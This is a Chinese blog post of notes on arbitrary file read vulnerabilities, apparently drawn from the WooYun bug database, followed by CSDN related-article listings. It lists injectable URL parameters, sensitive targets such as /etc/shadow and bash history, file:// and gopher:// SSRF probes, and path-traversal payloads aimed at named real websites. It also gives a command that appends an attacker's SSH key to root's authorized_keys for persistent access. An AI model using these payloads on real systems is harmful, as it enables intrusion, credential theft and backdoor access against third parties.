乌云漏洞笔记1-任意文件读取

最新推荐文章于 2023-04-26 21:24:14 发布
最新推荐文章于 2023-04-26 21:24:14 发布
阅读量5.7k 收藏 2
点赞数
分类专栏: 渗透测试 文章标签: 漏洞 阅读 任意文件读取
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cd_xuyue/article/details/50560259
版权

阅读时间16.01.18
page1-3

敏感字段

&RealPath=
&FilePath=
&filepath=
&Path=
&path=
&inputFile=
&url=
&urls=
&Lang=
&dis=
&data=
&readfile=
&filep=
&src=
&menu=
META-INF
WEB-INF

可利用路径

/etc/shadow
/etc/passwd
/etc/hosts
/root/.bash_history 找user add,cd,mysql,ssh,nohop看敏感目录和文件等
/etc/syscomfig/network-scripts/ifcfg-eth1
sed -i ‘/95_251/d’ /root/.ssh/authorized_keys
url=file:///etc/passwd
url=http://10.29.5.24(ssrf内网探测)
/opt/nginx/conf/nginx.conf
file:///,gopher://,ftp://
/configs/database.php

Payload

  1. http://...:8080/%c0%ae/WEB-INF/classes/com/huilan/application/action/PeopleBankAction.class

  2. 配合截断规则:/etc/passwd%00.jpg

  3. ../../../../../../../../../../etc/passwd%00.jpg

  4. http://www.zzvcom.com/cms/interface.jsp?time=41&data={readfile:%27/WEB-INF/classes/jdbc.properties%27}&jsoncallback=jsonp1442909681355

  5. http://localhost:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

  6. http://www.intime.com.cn:8000/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini

  7. echo ssh-rsa
    AAAAB3NzaC1yc2EAAAABIwAAAQEA0jrJeJfEURdpG/jddXzk3zZYxQfdHbgPC4QYh5qx0F2SS1Q+uCW6j2cM/SxqhocfgDYw1CTikNTlJ43tzv1ozpSRjmLH26aTxGDUnXsvyVLeWdrjPni1FoVffW+LM0rZVh7A74Vi1bDr7IP7XjSMQU157rye7++G+eWA1NhscIiiJ/pwUKAjPSiEx+8DXN8ccTDyWrSnD+NfUQXPO4dVFu2MR5/VjLO2yWsVMwenCPwItf5xEwGqU5KbzxeTOyDnYYLk7UF6lBYpSDZC9U3mNL1alYgNnIbmZGYg921KFh28BRptDewh5MRDKmfMUSqeZpIZ95Pq8lG1sObcjNzDew== root@szmlserver95_251.easou.com >> /root/.ssh/authorized_keys

Xyntax
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Apache Ofbiz 任意文件读取漏洞(CVE-2023-50968)
weixin_43567873的博客
03-11 32
Apache Ofbiz 任意文件读取漏洞(CVE-2023-50968)
正方教务管理系统数据库任意操作漏洞 _ 乌云漏洞库,乌云镜像站, WooYun 漏洞库, WooYun 镜像站1
08-03
正方教务管理系统数据库任意操作漏洞 | 乌云漏洞库,乌云镜像站, WooYun 漏洞库, WooYun 镜像站Home (/) / Bugs (/bug/ind
《从0到1:CTFer成长之路》1.3 任意文件读取漏洞
ZhShy
01-12 4701
文章目录1.3.1 文件读取漏洞常见触发点1.3.1.1 web语言1. PHP2.python3.Java4.Ruby5.Node1.3.1.2 中间件、服务件相关1.Nginx错误配置2.数据库3.软链接4.FFmpeg5.Docker-API1.3.1.3 客户端相关1.浏览器/Flash XSS2.MarkDown语法解析器XSS1.3.2 文件读取漏洞常见读取路径1.3.2.1 Linux1.flag名称(相对路径)2.服务器信息(绝对路径)1.3.2.2 Windows 1.3.1 文件读取漏洞
kkFileView任意读取漏洞思考
qq_82303224_的博客
04-26 2865
urlPath=file:///etc/passwd //突破限制目录。urlPath=file:///etc/passwd直接可以读文件和。urlPath=file:///etc/passwd 成功读取到内容,urlPath=file:///etc/passwd 提示限制目录预览。.思路7:..|/..|/..|/..|/..|/..|/..|/..|etc/passwd。file:///etc/passwd 也是 500。
QT---QDesktopServices打开本地文件
路在脚下,Quick run!
05-08 1041
代码: QString urlPath = "file:///"+文件路径; QDesktopServices::openUrl(QUrl::fromLocalFile(urlPath)); QDesktopServices::openUrl(QUrl(urlPath, QUrl::TolerantMode)); 说明: (1)如果文件名或路径中包含有中文或空格,则使用QUrl::fromLocalFile; (2)QUrl(fileName)只能打开英文名称和没有空格路径的文件。 (3)最好不
java file 转URL,将Java file:// URL转换为File(...)路径,独立于平台,包括UNC路径...
weixin_31617975的博客
02-16 549
I am developing a platform independent application. I am receiving a file URL*.On windows these are:file:///Z:/folder%20to%20file/file.txtfile://host/folder%20to%20file/file.txt (an UNC path)I am usin...
文件预览(通过URL访问本地资源)
weixin_54514751的博客
07-08 5589
一、addResourceHandlers:预览图片和pdf,其他文件不支持 图片或者视频存放在专门的服务器上面(Windows服务器),假设存储路径为C:\upload\data\picture\ 该路径下面存储的是所有需预览的图片。 二、kkFileView(file.dir是在properties中是固定值,服务启动后此路径不能动态更改) 1、kkfileview是一款开源的在线预览文档的工具,提供上传,http的预览访问方式 2、所有预览方式使用get方式请求 3、支持的格式
2021-07-09 CTFer成长之路-任意文件读取漏洞-文件读取漏洞常见读取路径(liunx)
热门推荐
时光隧道
07-09 5万+
一:文件读取漏洞常见触发点 1.Web语言 不同的Web语言,其文件读取漏洞的触发点也会存在差异,本小节以读取不同Web文件漏洞为例进行介绍,具体的漏洞场景请读者自行查阅,在此不再赘述。 1.1 PHP PHP标准函数中有关文件读的部分不再详细介绍,这些函数包括但可能不限于:file_get_contents()、file()、fopen()函数(及其文件指针操作函数fread()、fgets()等),与文件包含相关的函数(include()、require()、include_once()、require
ctf-文件包含-读取文件
wcwdnmdnmd的博客
06-03 3041
ctf-文件包含-读取文件打开网页看到源码几种方法 打开网页看到源码 可知有文件包含漏洞,以前已经学过 同时可get名为hello的变量 因为var_dump()的功能是输出变量的信息 所以如果变量为函数就会执行函数 可以看到flag.php 据此有如下方法查看flag.php: 几种方法 使用system()函数执行命令 cat flag.php 但当我们执行时发现输出了 **"?>"**猜测可能由于正着读eval()函数解析了php页面可以使用 tac命令倒着读,即: tac flag
kkfileview阿里云安全扫描:威胁类型敏感信息回显 (Sensitive Information Response)
weixin_43866043的博客
03-30 1765
kkfileview
从CTF比赛题看任意文件读取的危害
csd_ct的专栏
02-27 2149
最近在CTF_HUB上看到任意文件读取的一道web渗透测试题,详见ctfhub 中web afr-3,突然想到2020年参加网鼎杯白虎组,有个picdown的题目大同小异,手法相似,对任意文件读取漏洞的危害做个总结。 在afr-3中,任意文件读取漏洞如下,首先进入首页,如下图: 点进去,首页是个输入框,输入test,提交查询,如图: 在输入框这个地方存在xss,不过暂时先不管这个,重点关注任意文件读取。看到url中有个name=article,这个参数,猜测这个参数是突破点,将article.
乌云漏洞库/知识库离线下载-附件资源
03-05
乌云漏洞库/知识库离线下载-附件资源
乌云漏洞整理1
08-03
1. 进入网站http://tvp.multimedia.tcl.com/sysadmin/login.aspx 3. 修改上传设置,在图片类型中增加 asp
乌云月爆1-6期
10-30
以前,网络安全只是一个小的圈子,现在网络安全正在被更多的人认识,越来越多的人开始注意上网的安全性,越来越多的人开始在意自己的隐私是否会通过互联网被泄露,乌云君表示看到这样的变化很欣慰呀!《乌云月爆》...
BadUSB原理浅析及制作指南
乐枕的家
01-12 4万+
何为BadUsb简介通过硬件直接插入对方电脑,让对方电脑执行代码,达到干扰、控制主机或者窃取信息等目的。威胁BadUSB的威胁在于:恶意代码存在于U盘的固件中,PC上的杀毒软件无法访问到U盘存放固件的区域,因此也就意味着杀毒软件和U盘格式化都无法应对BadUSB的攻击。原理硬件知识基础HID攻击HID是Human Interface Device的缩写,由其名称可以了解HID设备是直接与人交互的设备
自动化WiFI钓鱼工具——WiFiPhisher源码解读
乐枕的家
08-28 1万+
自动化WiFI钓鱼工具——WiFiPhisher源码解读目录自动化WiFI钓鱼工具WiFiPhisher源码解读 目录 工具介绍 攻击原理 准备工作 源码解读工具介绍开源无线安全工具Wifiphisher是基于MIT许可模式的开源软件,运行于Kali Linux之上。 github.com/sophron/wifiphisher 它能够对WPA加密的AP无线热点实施自动化钓鱼攻击,获取密码账户。
JAVA反序列化exp及使用方法
乐枕的家
12-09 1万+
这两天很火的java反序列化漏洞,看到乌云大牛已经开始刷分,于是找来实践一波 exp来源ysoserialhttps://github.com/frohoff/ysoserial这个项目针对不同的java产品给出了简单的漏洞利用脚本. 其中weblogic和jenkins提供python脚本,但需自己加载payload. 而对于jboss和websphere则提供了poc的数据包. 更多信息在
记一次曲折的渗透测试经历
乐枕的家
04-21 1万+
昨天把jexboss脚本整合到我的多线程框架里,扫了一遍全国jboss,发现一千多个shell.工具地址在:https://github.com/Xyntax/POC-T随意拿了一个看似大厂商的,作本次入侵测试发现传送门通过jexboss拿到shell,看到是centos的机器(IP已打码).看起来是root,确认一下.不稳定的传送门shell的问题接下来执行命令的时候,发现这个jexboss自带的
无回显命令执行PoC编写指南(Apache Shiro Java反序列化)
乐枕的家
08-04 1万+
无回显命令成功执行与否,无法从web获取到标志性的信息,Java反序列化漏洞及属于该类型。验证方法针对无回显的命令执行漏洞,让目标机执行wget、nc或者curl等命令,然后在公网主机监听对应的端口,通过日志来判断命令是否被执行。该方法可行,不过缺陷有以下几点: 修改了目标机的文件系统 不具有通用性,如windows没有nc、linux没有wget的情况。 涉及到TCP数据传输,执行速度慢 一种更好
easyexcel 读取
最新发布
08-12
EasyExcel是一个Java库,用于读取和写入Excel文件。以下是使用EasyExcel读取Excel文件的步骤:首先,创建一个ExcelReader对象,用于读取Excel文件。通过调用EasyExcel.read方法,传入Excel文件的路径、实体类和监听器,构建ExcelReader对象。然后,调用ExcelReader的read方法,读取Excel文件中的数据。最后,调用ExcelReader的finish方法,关闭reader。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [EasyExcel轻松读取Excel文件!](https://blog.csdn.net/qq_48607414/article/details/128250637)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *3* [EasyExcel的写入和读取操作](https://blog.csdn.net/niki_yeun/article/details/127713098)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值